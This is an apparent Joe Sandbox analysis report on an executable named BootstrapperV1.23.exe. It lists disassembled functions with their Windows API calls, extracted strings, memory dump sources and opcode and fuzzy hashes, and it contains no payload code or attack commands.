Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E2985D
Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863

_abort.LIBCMT ref: 00E2BB80
_free.LIBCMT ref: 00E2BBB4

Strings

p, xrefs: 00E2BBAB

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p
API String ID: 289325740-2678736219
Opcode ID: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
Instruction ID: 15fdbd44f48bcd791a7b0f14fc037715d593f09df8cdc3609620c4b0c6053161
Opcode Fuzzy Hash: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
Instruction Fuzzy Hash: 46019232D01636DFCB21AF6AA80265DBBA1BF04B25B15211AF824B73D5CB756D41CFC1

Function 00E1B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00E1B42F

Strings

Z, xrefs: 00E1B441
(, xrefs: 00E1B457

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Malloc
String ID: ($Z
API String ID: 2696272793-3316338816
Opcode ID: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
Instruction ID: 98d11867cd1f6b443923dd8534495a3d43d477abf216eaefee471981793c48ee
Opcode Fuzzy Hash: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
Instruction Fuzzy Hash: A60146B6600108FF9F059FB1EC49CEFBBADEF083947004159F906E7120E671AA48DBA0

Function 00E28268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00E2BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C
Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
Part of subcall function 00E2BF30: _free.LIBCMT ref: 00E2BF95
Part of subcall function 00E2BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4

_free.LIBCMT ref: 00E282AE
_free.LIBCMT ref: 00E282B5

Strings

0", xrefs: 00E2829B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"
API String ID: 400815659-420201205
Opcode ID: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
Instruction ID: 0afc1705c8ef5555bbc12df09063c9a7959b18475b1ae8a7e10e7ff1d8de3130
Opcode Fuzzy Hash: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
Instruction Fuzzy Hash: 7DE02B33A07D7285B261327A3D1276F07844FD1378B15361AF610F70F3CE50880644A2

Function 00E10FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00E11206,?), ref: 00E10FEA
GetLastError.KERNEL32(?), ref: 00E10FF6

Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E10FFF

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: bd30456cbf086fb31fc57b654ba87c6ffc7668d9b56763c2519f1df34be2c8b7
Instruction ID: dc8ab3f6befe44e58beda6d49b1a47831620d748bbdcfbcdcb8d41894d7ef842
Opcode Fuzzy Hash: bd30456cbf086fb31fc57b654ba87c6ffc7668d9b56763c2519f1df34be2c8b7
Instruction Fuzzy Hash: F9D02E729086343ADA203334AC4EEAE7C04CB62332F202744F138712F2CA2449D18A92

Function 00E0E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00E0DA55,?), ref: 00E0E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E0DA55,?), ref: 00E0E2B1

Strings

RTL, xrefs: 00E0E2AB

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
Instruction ID: 97420e4e9fe3f16cf10fec1ddacb2c503bad6c3a857b4f98121fa470923178af
Opcode Fuzzy Hash: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
Instruction Fuzzy Hash: 58C012316407106AEA3427766D4DF936E585B00B16F091858B281FE6E2DAE5C9C8CAA0

Function 00E1E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E467

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

p, xrefs: 00E1E470
z, xrefs: 00E1E461

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: p$z
API String ID: 1269201914-1258701225
Opcode ID: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
Instruction ID: 881fff04b8cd4caeb91863219ad4e9072bd196a6f735cde23d5907a11d56a788
Opcode Fuzzy Hash: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
Instruction Fuzzy Hash: FFB012E1699141BC314891242C07CB7014CC8C0F90B30B02EFC14F0281D8408CC50532

Function 00E1E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E1E467

Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1

Strings

U, xrefs: 00E1E455
z, xrefs: 00E1E461

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: U$z
API String ID: 1269201914-4031037884
Opcode ID: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
Instruction ID: 6fa0f7d63be4714c285208db3de188063d46742906653ae6059ce71f57f15429
Opcode Fuzzy Hash: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
Instruction Fuzzy Hash: 52B012F1298100BC310815202D07CB7120CC8C0F50B30F02EFE10F0182D8414EC60432

Analysis Process: BootstrapperV1.23.exePID: 7772, Parent PID: 7428COMMON

Executed Functions

Function 00007FFD9B637140 Relevance: 2.6, Strings: 1, Instructions: 1336COMMON

Download Yara Rule

Strings

\, xrefs: 00007FFD9B6378E5

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 148bceb5dbfaa986912a5e04ea7c04680cbfd8467ac2541ab50ac739bfcaeb5e
Instruction ID: e72913636a9f849d60651eed3c3036312d892ad093bd65a40b173aed1ef89b87
Opcode Fuzzy Hash: 148bceb5dbfaa986912a5e04ea7c04680cbfd8467ac2541ab50ac739bfcaeb5e
Instruction Fuzzy Hash: C1929931B0EA4A4FE769DB688465A7977D1EF45300F1540BED4AECB1E2ED28BD428341

Function 00007FFD9B627390 Relevance: .9, Instructions: 903COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81684b6cd24638d3dfa3f521c409e9982461f3e2cff5cc4f37f9af8678ea10f
Instruction ID: 7e6050eaac27b43962895c804a5665ff6bb1dd6639ebd1381d2994b82dea457e
Opcode Fuzzy Hash: b81684b6cd24638d3dfa3f521c409e9982461f3e2cff5cc4f37f9af8678ea10f
Instruction Fuzzy Hash: A752B431B09A4D8FEBA8EF58C865AA937E1FF59300F050179E45ED72A1CA29FD41CB41

Function 00007FFD9B627270 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c53edf7aa70b8fa5d655b4550e07fc54e19f6176a2d49c1676a7ed40b4511e61
Instruction ID: c4f613025a87d6e483fedaa6b424b3c42a7f90bfa7f08d9422e216e12d92522a
Opcode Fuzzy Hash: c53edf7aa70b8fa5d655b4550e07fc54e19f6176a2d49c1676a7ed40b4511e61
Instruction Fuzzy Hash: FCC1A231B09A4E4FEF94EF6CC495AA93BE1FF69350B05017AE41DD72A1CA24ED41C781

Function 00007FFD9B6250F8 Relevance: 1.9, Strings: 1, Instructions: 678COMMON

Download Yara Rule

Strings

#M, xrefs: 00007FFD9B626297

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: #M
API String ID: 0-3502409481
Opcode ID: 4659b426fd7fc6d102b10d4c9b00032711b7bf5c2c737c9825e3db8117800c15
Instruction ID: a9eaea9e10069fc2ad5bc37b16b10c827a4dfc97e07ced163d9ae20a5aed4735
Opcode Fuzzy Hash: 4659b426fd7fc6d102b10d4c9b00032711b7bf5c2c737c9825e3db8117800c15
Instruction Fuzzy Hash: EC128D22B0DA8E4FF768A76C94666F977D1EF95350F0402BAE09DC71E7DD18B8428341

Function 00007FFD9B63B2F7 Relevance: 1.7, Strings: 1, Instructions: 456COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B63B70E

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 9a6bf5caf21879741940274d09525976cd0f5ba96b97f8f8d025591a6a19ef27
Instruction ID: 770e68fa01ea5cd12e02b466a0703370e2ab0052859bbf6bca887a10e5be0b1e
Opcode Fuzzy Hash: 9a6bf5caf21879741940274d09525976cd0f5ba96b97f8f8d025591a6a19ef27
Instruction Fuzzy Hash: 9BD12130A0DB494FE768DB588864675B3E1FF95300F1945BEE09ECB2A6DE35F9428740

Function 00007FFD9B62C0B0 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

{M_H, xrefs: 00007FFD9B62C13F

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: {M_H
API String ID: 0-2686217771
Opcode ID: 1ec916ea0d4699efae6c54e9c8201afb659a975d66073565490b0877549272e2
Instruction ID: 1d9511ac195bfa2a2959a3655f2a7d75f9755862ad5685b894aef0f3c2b4daec
Opcode Fuzzy Hash: 1ec916ea0d4699efae6c54e9c8201afb659a975d66073565490b0877549272e2
Instruction Fuzzy Hash: 3AB10163B0FD5E0FFBB896AC546927423E1EFA869172101B7D86DCB2E5DD14BD064380

Function 00007FFD9B629380 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B62B3FE

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 1f7e4d435eb542b1ad2b088e60b517d03fa22629236a7e91b717d28009722424
Instruction ID: f507d07b5927452385c72cb397b0406eed9434899502163c9daa575b17371824
Opcode Fuzzy Hash: 1f7e4d435eb542b1ad2b088e60b517d03fa22629236a7e91b717d28009722424
Instruction Fuzzy Hash: 14C1EE30A1DB098FE728DB08D895635B3E1FFD9344B18457DD09AC76A6DA35F8438B81

Function 00007FFD9B6397B8 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B63B70E

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 291375bd35a6cff24d71c4527f977050772bd4f8339e0a55b05354191725bd7c
Instruction ID: 1b94a4cfe4b8157c66b325e3307f0ca218950670850ecf62d3be029e48a21efd
Opcode Fuzzy Hash: 291375bd35a6cff24d71c4527f977050772bd4f8339e0a55b05354191725bd7c
Instruction Fuzzy Hash: E0C1103071DB098FD768DB18D4A1536B3E1FF99300B194A7DE09AC76A6DE35F8428B81

Function 00007FFD9B630FC6 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

&q[H, xrefs: 00007FFD9B6310BD

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: &q[H
API String ID: 0-3496370340
Opcode ID: 817904dc851b15ad8681370a1aa8d6ded026708bf88605da40f50c5346443712
Instruction ID: e5514a9080d8fde902fc504dcb3ceddcd3100c3a5432e0ad107de1aae500a870
Opcode Fuzzy Hash: 817904dc851b15ad8681370a1aa8d6ded026708bf88605da40f50c5346443712
Instruction Fuzzy Hash: 85B1FB72B0EA8D0FEBA5DB6858756B83BD1EF99354B0A00B9E45DCB1E7DD15A842C300

Function 00007FFD9B62B168 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B62B3FE

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ad1e14b226dac74c3e5318fd6c0cf10035ab08e958c47f9b4b21a24381563b7f
Instruction ID: 6d39aac1a50618bed9930995c24d424e8ff4498d4f81aab03323050df9ebc27a
Opcode Fuzzy Hash: ad1e14b226dac74c3e5318fd6c0cf10035ab08e958c47f9b4b21a24381563b7f
Instruction Fuzzy Hash: 9281BF30A19B098BEB68DB48C494635B3E1FFD8344B18457DD4AAC72A6DA31F9428B81

Function 00007FFD9B631067 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

&q[H, xrefs: 00007FFD9B6310BD

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: &q[H
API String ID: 0-3496370340
Opcode ID: 2aadb24a2df5e3cd5dc4134bf2dcbf7347be70535f51ee4d961d434fafb8a052
Instruction ID: 7dd01d60ee9961c45e0a453d1b5dd73a04b3abb00bfe6cb442a1b3a5b89faf50
Opcode Fuzzy Hash: 2aadb24a2df5e3cd5dc4134bf2dcbf7347be70535f51ee4d961d434fafb8a052
Instruction Fuzzy Hash: F5610862B0FAC90FE7A5DB7C54A96A83BD1EF99350B1900F9D459CB1E7DD19AC438300

Function 00007FFD9B62118C Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9B6211B7

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 142b67a700b4c04112ab422f4ed2d10577733d390e8fc024071a5971bad2d857
Instruction ID: 6734a22c1c18a8e76ee4d3314afe041ccf38d385afcf1c34e8ec07ce0968952e
Opcode Fuzzy Hash: 142b67a700b4c04112ab422f4ed2d10577733d390e8fc024071a5971bad2d857
Instruction Fuzzy Hash: AC11347045E3C55FE7028BB484262AA7FE0EF0B354F4885BDD4CACB1A2D62C4806C703

Function 00007FFD9B6273C2 Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438685a143447dcd039eebf84ac93be025d5dd854a59f963724c7b7ab75f823f
Instruction ID: 5466eb7824167a1349c2cdf8ecb31bac0953f3be29bc3069726e3aa8c05b8e69
Opcode Fuzzy Hash: 438685a143447dcd039eebf84ac93be025d5dd854a59f963724c7b7ab75f823f
Instruction Fuzzy Hash: E4020831A0EA494FE769DB28C4A5AB57BE1FF95300F04427ED49AC71A6CE24BD42C781

Function 00007FFD9B626390 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd181c6047fe5d98c46b3fdef5d6e0633af47d6eda676fa85e0ae2da6b2cfb43
Instruction ID: cc339bb8b1a92a8e7a41e970d23106ade61bd2e5bbdeecf17bff0cd6f5c7767f
Opcode Fuzzy Hash: dd181c6047fe5d98c46b3fdef5d6e0633af47d6eda676fa85e0ae2da6b2cfb43
Instruction Fuzzy Hash: 2FE1B371A0DB894FE768EB2C846566AB7D2FFA5300F00457EE49DC72A6DE34B8418742

Function 00007FFD9B635179 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea5673b6e18bf3a40c40bb55286c4467830b483e9ebcd4bcbebd95330d942966
Instruction ID: 114ae7c3ed2bc2065894b16ee88da5935461855c59da01436cc8ee40ea0e546d
Opcode Fuzzy Hash: ea5673b6e18bf3a40c40bb55286c4467830b483e9ebcd4bcbebd95330d942966
Instruction Fuzzy Hash: DDE12421B0EA4A4BF77996A848B12B877D1EF46310F1740BAC4AECF1E7DD1D7A424342

Function 00007FFD9B6209FF Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bb2b13170113ec1309c766c46b4af334a205dfaac21e6156af1a26d4eac20b
Instruction ID: dd1c3117f6d1aa12957cb41c60aa2b05ead1df073b7f743988911014eae78f4f
Opcode Fuzzy Hash: d6bb2b13170113ec1309c766c46b4af334a205dfaac21e6156af1a26d4eac20b
Instruction Fuzzy Hash: FDE1B230B0A6495FF769EBB484656AD77E1EF45310F5184BDD05ECB2E6CE2C6882CB01

Function 00007FFD9B6272B0 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff54e8a3349f5abbe2a84f5f7ddbe21204f02f46608f734706e6590d1bedfa8d
Instruction ID: 43fd7b6ca4aa69e6d5d809674619b5510ba28cd927a12fa2e662e6de6a54bcd8
Opcode Fuzzy Hash: ff54e8a3349f5abbe2a84f5f7ddbe21204f02f46608f734706e6590d1bedfa8d
Instruction Fuzzy Hash: 86C10631B0DB4D4FDB68EF6888659B97BE1FF99310B0501BEE449C72A6DE24BD018781

Function 00007FFD9B6398D3 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef6387ac06b27ce93660b3e64beac063c8b1595bb298bc36c5e2fa246252574
Instruction ID: e8f8670b8770a6efab65744bf405ff649757d212dc21167203f4c82c9cb6dff7
Opcode Fuzzy Hash: 3ef6387ac06b27ce93660b3e64beac063c8b1595bb298bc36c5e2fa246252574
Instruction Fuzzy Hash: 83B14C31A0E68D4FEB64EF5C98695F97BD1EF42350F0901BAD05A8B1E3D925BD018B81

Function 00007FFD9B636ACC Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2158279281.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b620000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762e1fbe8ecf40d284a2e3198692ab25d4142c1eb8b97a2854f9ac09c2bc345a
Instruction ID: 33d6fd196d5d5fb12784d1fd2a7194cecf9e95bc9be43a743da6eabf3d491042
Opcode Fuzzy Hash: 762e1fbe8ecf40d284a2e3198692ab25d4142c1eb8b97a2854f9ac09c2bc345a
Instruction Fuzzy Hash: 72A1D531B0DA4D4FEBA5EB7C84696783BD1EF9921075600FAD05DCB2A7DD28AC428741
